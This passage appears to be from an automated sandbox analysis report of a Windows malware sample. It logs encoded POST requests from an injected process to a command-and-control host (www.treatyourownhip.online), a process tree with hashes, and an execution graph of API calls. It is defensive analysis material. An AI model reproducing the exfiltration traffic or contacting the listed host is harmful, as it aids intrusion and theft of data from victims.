                                                                                                                                                                          Data Raw: 39 58 3d 45 43 46 73 70 64 6a 33 31 71 78 31 33 66 49 48 76 37 36 62 57 4d 75 34 66 58 6c 6b 2b 6e 2f 43 32 5a 4c 47 68 70 58 7a 54 35 56 4e 67 54 67 39 32 64 34 70 4f 4c 41 69 6b 74 72 35 69 4d 4c 51 55 67 64 45 47 46 63 34 70 64 6b 34 4d 42 54 54 37 75 4b 68 34 4a 65 59 61 33 4d 56 66 49 58 56 32 42 30 53 42 52 31 5a 7a 33 31 45 74 49 54 50 46 4e 57 66 61 77 2f 76 71 61 61 53 74 4d 63 4b 44 37 54 6b 6d 2f 52 6e 66 5a 4c 36 4f 36 46 39 4c 5a 4a 49 67 2f 51 31 47 77 30 43 4c 4e 45 48 67 50 2b 5a 36 32 69 34 49 54 71 34 41 71 74 39 38 33 42 6e 35 4f 37 65 45 66 35 30 6d 6d 41 44 61 49 66 45 47 6f 6b 3d
                                                                                                                                                                          Data Ascii: 9X=ECFspdj31qx13fIHv76bWMu4fXlk+n/C2ZLGhpXzT5VNgTg92d4pOLAiktr5iMLQUgdEGFc4pdk4MBTT7uKh4JeYa3MVfIXV2B0SBR1Zz31EtITPFNWfaw/vqaaStMcKD7Tkm/RnfZL6O6F9LZJIg/Q1Gw0CLNEHgP+Z62i4ITq4Aqt983Bn5O7eEf50mmADaIfEGok=
                                                                                                                                                                          Oct 23, 2024 17:16:07.693495035 CEST374INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:16:07 GMT
                                                                                                                                                                          Server: Apache/2.4.62 (Unix)
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          54192.168.2.55003181.169.145.95802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:16:09.399207115 CEST819OUTPOST /k7fo/ HTTP/1.1
                                                                                                                                                                          Host: www.treatyourownhip.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.treatyourownhip.online
                                                                                                                                                                          Referer: http://www.treatyourownhip.online/k7fo/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 45 43 46 73 70 64 6a 33 31 71 78 31 78 2f 59 48 30 62 47 62 58 73 75 37 55 33 6c 6b 73 6e 2f 65 32 5a 58 47 68 6f 54 6a 51 4c 42 4e 67 79 51 39 31 66 63 70 65 62 41 69 76 4e 72 34 6d 4d 4c 48 55 67 67 37 47 41 30 34 70 64 77 34 4d 45 33 54 37 35 2b 2b 36 5a 65 65 53 58 4d 58 53 6f 58 56 32 42 30 53 42 52 78 6a 7a 33 74 45 74 34 44 50 46 76 2b 63 58 51 2f 77 36 4b 61 53 70 4d 63 4f 44 37 54 47 6d 36 49 43 66 62 7a 36 4f 37 31 39 49 49 4a 48 76 2f 51 7a 49 51 31 67 4b 59 6c 65 6d 2b 75 4d 79 67 33 34 58 43 54 42 49 38 63 58 6d 56 4a 50 71 75 58 6d 55 4d 78 44 33 57 68 71 41 72 50 30 59 2f 79 34 55 39 39 71 72 41 6a 44 77 77 49 41 4e 51 4f 6d 71 52 44 32
                                                                                                                                                                          Data Ascii: 9X=ECFspdj31qx1x/YH0bGbXsu7U3lksn/e2ZXGhoTjQLBNgyQ91fcpebAivNr4mMLHUgg7GA04pdw4ME3T75++6ZeeSXMXSoXV2B0SBRxjz3tEt4DPFv+cXQ/w6KaSpMcOD7TGm6ICfbz6O719IIJHv/QzIQ1gKYlem+uMyg34XCTBI8cXmVJPquXmUMxD3WhqArP0Y/y4U99qrAjDwwIANQOmqRD2
                                                                                                                                                                          Oct 23, 2024 17:16:10.242563963 CEST374INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:16:10 GMT
                                                                                                                                                                          Server: Apache/2.4.62 (Unix)
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          55192.168.2.55003281.169.145.9580
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:16:12.290148020 CEST1836OUTPOST /k7fo/ HTTP/1.1
                                                                                                                                                                          Host: www.treatyourownhip.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.treatyourownhip.online
                                                                                                                                                                          Referer: http://www.treatyourownhip.online/k7fo/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 45 43 46 73 70 64 6a 33 31 71 78 31 78 2f 59 48 30 62 47 62 58 73 75 37 55 33 6c 6b 73 6e 2f 65 32 5a 58 47 68 6f 54 6a 51 4b 35 4e 67 67 59 39 76 2b 63 70 64 62 41 69 73 4e 72 31 6d 4d 4c 47 55 6b 30 2f 47 41 77 4f 70 66 49 34 4e 69 72 54 71 39 69 2b 7a 5a 65 65 51 58 4d 53 66 49 58 4d 32 42 6b 57 42 52 42 6a 7a 33 74 45 74 2b 48 50 56 74 57 63 45 67 2f 76 71 61 61 67 74 4d 63 69 44 37 62 38 6d 37 38 38 65 72 54 36 4f 62 6c 39 4f 36 78 48 77 50 51 78 4c 51 31 47 4b 59 68 37 6d 2b 79 41 79 67 72 43 58 46 33 42 59 49 31 55 33 45 46 51 77 4f 76 73 45 64 4e 59 6d 79 78 4f 4c 35 62 7a 61 64 61 4a 63 75 59 49 6b 58 66 75 39 6a 4a 34 57 33 4b 64 72 42 76 39 64 70 62 63 43 64 6f 44 4a 71 62 4b 6e 59 63 48 79 52 69 7a 47 53 47 61 2b 59 4c 58 6e 38 61 69 35 33 42 68 45 7a 79 75 36 6b 79 45 2f 37 76 66 73 45 39 59 74 6d 4c 32 70 76 37 38 77 78 38 38 4c 6d 38 5a 4d 70 5a 47 4f 2f 55 50 6a 6a 6f 33 4a 56 6f 70 79 67 48 2b 38 2f 4a 39 68 68 68 47 71 35 36 6d 61 78 57 75 62 67 34 7a 74 71 75 70 57 4e 4a [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=ECFspdj31qx1x/YH0bGbXsu7U3lksn/e2ZXGhoTjQK5NggY9v+cpdbAisNr1mMLGUk0/GAwOpfI4NirTq9i+zZeeQXMSfIXM2BkWBRBjz3tEt+HPVtWcEg/vqaagtMciD7b8m788erT6Obl9O6xHwPQxLQ1GKYh7m+yAygrCXF3BYI1U3EFQwOvsEdNYmyxOL5bzadaJcuYIkXfu9jJ4W3KdrBv9dpbcCdoDJqbKnYcHyRizGSGa+YLXn8ai53BhEzyu6kyE/7vfsE9YtmL2pv78wx88Lm8ZMpZGO/UPjjo3JVopygH+8/J9hhhGq56maxWubg4ztqupWNJVTlNqCKeXCEGocblMISxFBoDaDvYiQG4jgzKY92hhHv1E/FmgiqiLwQ/xMogpL4aT22Vp0zaIaxYOkMQwuskx6Uk5Q7EyMe5jx/iEejJ1mj7y5fO0oloy1pOWfSr9gOmBFQJitIPkoUYArHq1mXVocNimzIZJkBG4C5j786mb7CeB9XQUmduwnBOGzeHh5wba5iqoGkJo6zuhZ0zroO8Fo/Um3JZDTUU9IhgWSDBV80rJWzRZXjYI9rXywVawWOMmfKlwDF5tzgojNKmUMRp62zrIUqgUq52gm5O2vM++XhUMRWjPb3A4ct3EktjLtb0JQEjUGUhhRZMwV5yUn3xyjiZzySlYAEp9+3dZGEZpXmdXwwPBLFcyqaENq9g5Npk5a77/o0nL6ndRv0HbLX024b9IhqFRCKBYRlWRIpAJ+f862iIO3cj4A1+h/4IDNb42BHNKKKOlcFpysIAjsQ3TcZVH811w1j26CVEqnFip45M1ThX+cCk+71Tl3GymX7NfTtK50q0sApziE2Rs9RiCD2caNWAmEvH4VOkR1+JuhmK7/fuohcfnb/o2I0oisgqgsdl64dsfQqWRtjLMOL+LDXPSuPk9/63UqaxuS1dZ0HVnsTVsrAHBx6DDiN46WED5LBr6gqirmYCytW6LWD6IbRxv9i38IFt8z [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:16:13.336780071 CEST374INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:16:12 GMT
                                                                                                                                                                          Server: Apache/2.4.62 (Unix)
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:11:12:02
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\LlbpXphTu9.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\LlbpXphTu9.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'322'495 bytes
                                                                                                                                                                          MD5 hash:1BCE82EA786776F80C8CCB92AD160EDE
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:11:12:03
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\LlbpXphTu9.exe"
                                                                                                                                                                          Imagebase:0xae0000
                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:11:12:25
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe"
                                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:11:12:27
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\regsvr32.exe"
                                                                                                                                                                          Imagebase:0xa10000
                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                          MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:11:12:40
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe"
                                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:11:12:52
                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                          Imagebase:0x7ff79f9e0000
                                                                                                                                                                          File size:676'768 bytes
                                                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:2.9%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.2%
                                                                                                                                                                            Signature Coverage:3.7%
                                                                                                                                                                            Total number of Nodes:1393
                                                                                                                                                                            Total number of Limit Nodes:33
                                                                                                                                                                            execution_graph 84767 40f110 RegOpenKeyExW 84768 40f13c RegQueryValueExW RegCloseKey 84767->84768 84769 40f15f 84767->84769 84768->84769 84770 429212 84775 410b90 84770->84775 84776 410b9a __write_nolock 84775->84776 84795 41171a 84776->84795 84780 410c66 _wcsncat 84810 413e3c 84780->84810 84783 41171a 75 API calls 84784 410ca3 _wcscpy 84783->84784 84785 410cd1 RegOpenKeyExW 84784->84785 84786 429bc3 RegQueryValueExW 84785->84786 84787 410cf7 84785->84787 84788 429cd9 RegCloseKey 84786->84788 84790 429bf2 _wcscat _wcslen _wcsncpy 84786->84790 84792 411421 84787->84792 84789 41171a 75 API calls 84789->84790 84790->84789 84791 429cd8 84790->84791 84791->84788 84885 4113e5 84792->84885 84794 41142e 84797 411724 84795->84797 84798 410c31 GetModuleFileNameW 84797->84798 84801 411740 std::bad_alloc::bad_alloc 84797->84801 84813 4138ba 84797->84813 84831 411afc 6 API calls __decode_pointer 84797->84831 84807 413db0 84798->84807 84803 411421 __cinit 74 API calls 84801->84803 84805 411766 84801->84805 84802 411770 84833 41805b RaiseException 84802->84833 84803->84805 84832 4116fd 67 API calls std::exception::exception 84805->84832 84806 41177e 84843 413b95 84807->84843 84873 41abec 84810->84873 84814 41396d 84813->84814 84824 4138cc 84813->84824 84841 411afc 6 API calls __decode_pointer 84814->84841 84816 413973 84842 417f23 67 API calls __getptd_noexit 84816->84842 84821 413929 RtlAllocateHeap 84821->84824 84822 4138dd 84822->84824 84834 418252 67 API calls 2 library calls 84822->84834 84835 4180a7 67 API calls 7 library calls 84822->84835 84836 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84822->84836 84824->84821 84824->84822 84825 413959 84824->84825 84828 41395e 84824->84828 84830 413965 84824->84830 84837 41386b 67 API calls 4 library calls 84824->84837 84838 411afc 6 API calls __decode_pointer 84824->84838 84839 417f23 67 API calls __getptd_noexit 84825->84839 84840 417f23 67 API calls __getptd_noexit 84828->84840 84830->84797 84831->84797 84832->84802 84833->84806 84834->84822 84835->84822 84837->84824 84838->84824 84839->84828 84840->84830 84841->84816 84842->84830 84844 413c2f 84843->84844 84845 413bae 84843->84845 84846 413d60 84844->84846 84847 413d7b 84844->84847 84845->84844 84859 413c1d 84845->84859 84865 41ab19 67 API calls _sprintf 84845->84865 84869 417f23 67 API calls __getptd_noexit 84846->84869 84871 417f23 67 API calls __getptd_noexit 84847->84871 84850 413d65 84855 413cfb 84850->84855 84870 417ebb 6 API calls 2 library calls 84850->84870 84853 413d03 84853->84844 84853->84855 84857 413d8e 84853->84857 84854 413cb9 84854->84844 84856 413cd6 84854->84856 84867 41ab19 67 API calls _sprintf 84854->84867 84855->84780 84856->84844 84856->84855 84861 413cef 84856->84861 84872 41ab19 67 API calls _sprintf 84857->84872 84859->84844 84864 413c9b 84859->84864 84866 41ab19 67 API calls _sprintf 84859->84866 84868 41ab19 67 API calls _sprintf 84861->84868 84864->84853 84864->84854 84865->84859 84866->84864 84867->84856 84868->84855 84869->84850 84871->84850 84872->84855 84874 41ac02 84873->84874 84875 41abfd 84873->84875 84882 417f23 67 API calls __getptd_noexit 84874->84882 84875->84874 84881 41ac22 84875->84881 84877 41ac07 84883 417ebb 6 API calls 2 library calls 84877->84883 84880 410c99 84880->84783 84881->84880 84884 417f23 67 API calls __getptd_noexit 84881->84884 84882->84877 84884->84877 84886 4113f1 __alloc_osfhnd 84885->84886 84893 41181b 84886->84893 84892 411412 __alloc_osfhnd 84892->84794 84919 418407 84893->84919 84895 4113f6 84896 4112fa 84895->84896 84984 4169e9 TlsGetValue 84896->84984 84899 4169e9 __decode_pointer 6 API calls 84900 41131e 84899->84900 84901 4113a1 84900->84901 84994 4170e7 68 API calls 5 library calls 84900->84994 84916 41141b 84901->84916 84903 41133c 84904 411388 84903->84904 84907 411357 84903->84907 84908 411366 84903->84908 84905 41696e __encode_pointer 6 API calls 84904->84905 84906 411396 84905->84906 84909 41696e __encode_pointer 6 API calls 84906->84909 84995 417047 73 API calls _realloc 84907->84995 84908->84901 84911 411360 84908->84911 84909->84901 84911->84908 84913 41137c 84911->84913 84996 417047 73 API calls _realloc 84911->84996 84997 41696e TlsGetValue 84913->84997 84914 411376 84914->84901 84914->84913 85009 411824 84916->85009 84920 41841c 84919->84920 84921 41842f EnterCriticalSection 84919->84921 84926 418344 84920->84926 84921->84895 84923 418422 84923->84921 84954 4117af 67 API calls 3 library calls 84923->84954 84925 41842e 84925->84921 84927 418350 __alloc_osfhnd 84926->84927 84928 418360 84927->84928 84929 418378 84927->84929 84955 418252 67 API calls 2 library calls 84928->84955 84935 418386 __alloc_osfhnd 84929->84935 84958 416fb6 84929->84958 84932 418365 84956 4180a7 67 API calls 7 library calls 84932->84956 84935->84923 84936 41836c 84957 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84936->84957 84937 4183a7 84941 418407 __lock 67 API calls 84937->84941 84938 418398 84964 417f23 67 API calls __getptd_noexit 84938->84964 84943 4183ae 84941->84943 84944 4183e2 84943->84944 84945 4183b6 84943->84945 84947 413a88 __mtterm 67 API calls 84944->84947 84965 4189e6 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 84945->84965 84949 4183d3 84947->84949 84948 4183c1 84948->84949 84966 413a88 84948->84966 84980 4183fe LeaveCriticalSection _doexit 84949->84980 84952 4183cd 84979 417f23 67 API calls __getptd_noexit 84952->84979 84954->84925 84955->84932 84956->84936 84961 416fbf 84958->84961 84959 4138ba _malloc 66 API calls 84959->84961 84960 416ff5 84960->84937 84960->84938 84961->84959 84961->84960 84962 416fd6 Sleep 84961->84962 84963 416feb 84962->84963 84963->84960 84963->84961 84964->84935 84965->84948 84968 413a94 __alloc_osfhnd 84966->84968 84967 413b0d __alloc_osfhnd _realloc 84967->84952 84968->84967 84969 413ad3 84968->84969 84971 418407 __lock 65 API calls 84968->84971 84969->84967 84970 413ae8 RtlFreeHeap 84969->84970 84970->84967 84972 413afa 84970->84972 84974 413aab ___sbh_find_block 84971->84974 84983 417f23 67 API calls __getptd_noexit 84972->84983 84976 413ac5 84974->84976 84981 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 84974->84981 84975 413aff GetLastError 84975->84967 84982 413ade LeaveCriticalSection _doexit 84976->84982 84979->84949 84980->84935 84981->84976 84982->84969 84983->84975 84985 416a01 84984->84985 84986 416a22 GetModuleHandleW 84984->84986 84985->84986 84987 416a0b TlsGetValue 84985->84987 84988 416a32 84986->84988 84989 416a3d GetProcAddress 84986->84989 84993 416a16 84987->84993 85007 41177f Sleep GetModuleHandleW 84988->85007 84991 41130e 84989->84991 84991->84899 84992 416a38 84992->84989 84992->84991 84993->84986 84993->84991 84994->84903 84995->84911 84996->84914 84998 4169a7 GetModuleHandleW 84997->84998 84999 416986 84997->84999 85000 4169c2 GetProcAddress 84998->85000 85001 4169b7 84998->85001 84999->84998 85002 416990 TlsGetValue 84999->85002 85004 41699f 85000->85004 85008 41177f Sleep GetModuleHandleW 85001->85008 85006 41699b 85002->85006 85004->84904 85005 4169bd 85005->85000 85005->85004 85006->84998 85006->85004 85007->84992 85008->85005 85012 41832d LeaveCriticalSection 85009->85012 85011 411420 85011->84892 85012->85011 85013 409030 85027 409110 117 API calls 85013->85027 85015 42ceb6 85041 410ae0 VariantClear ctype 85015->85041 85017 40906e 85017->85015 85019 42cea9 85017->85019 85021 4090a4 85017->85021 85018 42cebf 85040 45e62e 116 API calls 3 library calls 85019->85040 85028 404160 85021->85028 85024 4090f0 ctype 85026 4090be ctype 85026->85024 85036 4092c0 85026->85036 85027->85017 85029 4092c0 VariantClear 85028->85029 85030 40416e 85029->85030 85042 404120 85030->85042 85032 40419b 85046 4734b7 85032->85046 85090 40efe0 85032->85090 85033 4041c6 85033->85015 85033->85026 85037 4092c8 ctype 85036->85037 85038 429db0 VariantClear 85037->85038 85039 4092d5 ctype 85037->85039 85038->85039 85039->85026 85040->85015 85041->85018 85043 40412e 85042->85043 85044 4092c0 VariantClear 85043->85044 85045 404138 85044->85045 85045->85032 85098 453063 85046->85098 85049 473545 85102 463c42 85049->85102 85050 47350c 85052 4092c0 VariantClear 85050->85052 85059 473514 85052->85059 85053 473558 85054 47355c 85053->85054 85073 473595 85053->85073 85055 4092c0 VariantClear 85054->85055 85057 473564 85055->85057 85056 473616 85115 463d7e 85056->85115 85057->85033 85059->85033 85060 473622 85062 473697 85060->85062 85063 47362c 85060->85063 85061 453063 111 API calls 85061->85073 85149 457838 85062->85149 85066 4092c0 VariantClear 85063->85066 85068 473634 85066->85068 85068->85033 85069 473655 85072 4092c0 VariantClear 85069->85072 85084 47365d 85072->85084 85073->85056 85073->85061 85073->85069 85161 462f5a 87 API calls __wcsicoll 85073->85161 85074 4736b0 85162 45e62e 116 API calls 3 library calls 85074->85162 85075 4736c9 85163 40e7e0 76 API calls 85075->85163 85078 4736db 85088 4736ff 85078->85088 85164 40d030 76 API calls 85078->85164 85079 4736ba GetCurrentProcess TerminateProcess 85079->85075 85081 473731 85086 473744 FreeLibrary 85081->85086 85087 47374b 85081->85087 85082 4736f1 85165 46b945 134 API calls 2 library calls 85082->85165 85084->85033 85086->85087 85087->85033 85088->85081 85166 40d030 76 API calls 85088->85166 85167 46b945 134 API calls 2 library calls 85088->85167 85091 40eff5 CreateFileW 85090->85091 85092 4299bf 85090->85092 85094 40f017 85091->85094 85093 4299c4 CreateFileW 85092->85093 85092->85094 85093->85094 85095 4299ea 85093->85095 85094->85033 85212 40e0d0 SetFilePointerEx SetFilePointerEx 85095->85212 85097 4299f5 85097->85094 85099 45306e 85098->85099 85100 45307a 85098->85100 85099->85100 85168 452e2a 111 API calls 5 library calls 85099->85168 85100->85049 85100->85050 85169 45335b 76 API calls 85102->85169 85104 463c5d 85170 442c52 80 API calls _wcslen 85104->85170 85106 463c72 85114 463cac 85106->85114 85171 40c060 85106->85171 85111 463ca4 85177 40c740 85111->85177 85113 463cf7 85113->85053 85114->85113 85182 462f5a 87 API calls __wcsicoll 85114->85182 85116 453063 111 API calls 85115->85116 85117 463d99 85116->85117 85118 463de0 85117->85118 85119 463dca 85117->85119 85194 40c760 78 API calls 85118->85194 85193 453081 111 API calls 85119->85193 85122 463dd0 LoadLibraryW 85124 463e09 85122->85124 85123 463de7 85128 463e19 85123->85128 85195 40c760 78 API calls 85123->85195 85126 463e3e 85124->85126 85124->85128 85129 463e4e 85126->85129 85130 463e7b 85126->85130 85127 463dfb 85127->85128 85196 40c760 78 API calls 85127->85196 85128->85060 85197 40d500 75 API calls 85129->85197 85199 40c760 78 API calls 85130->85199 85134 463e57 85198 45efe7 77 API calls ctype 85134->85198 85135 463e82 GetProcAddress 85138 463e90 85135->85138 85137 463e62 GetProcAddress 85140 463e79 85137->85140 85138->85128 85139 463edf 85138->85139 85138->85140 85139->85128 85143 463eef FreeLibrary 85139->85143 85140->85138 85200 403470 75 API calls _realloc 85140->85200 85142 463eb4 85201 40d500 75 API calls 85142->85201 85143->85128 85145 463ebd 85202 45efe7 77 API calls ctype 85145->85202 85147 463ec8 GetProcAddress 85203 401330 ctype 85147->85203 85150 457a4c 85149->85150 85156 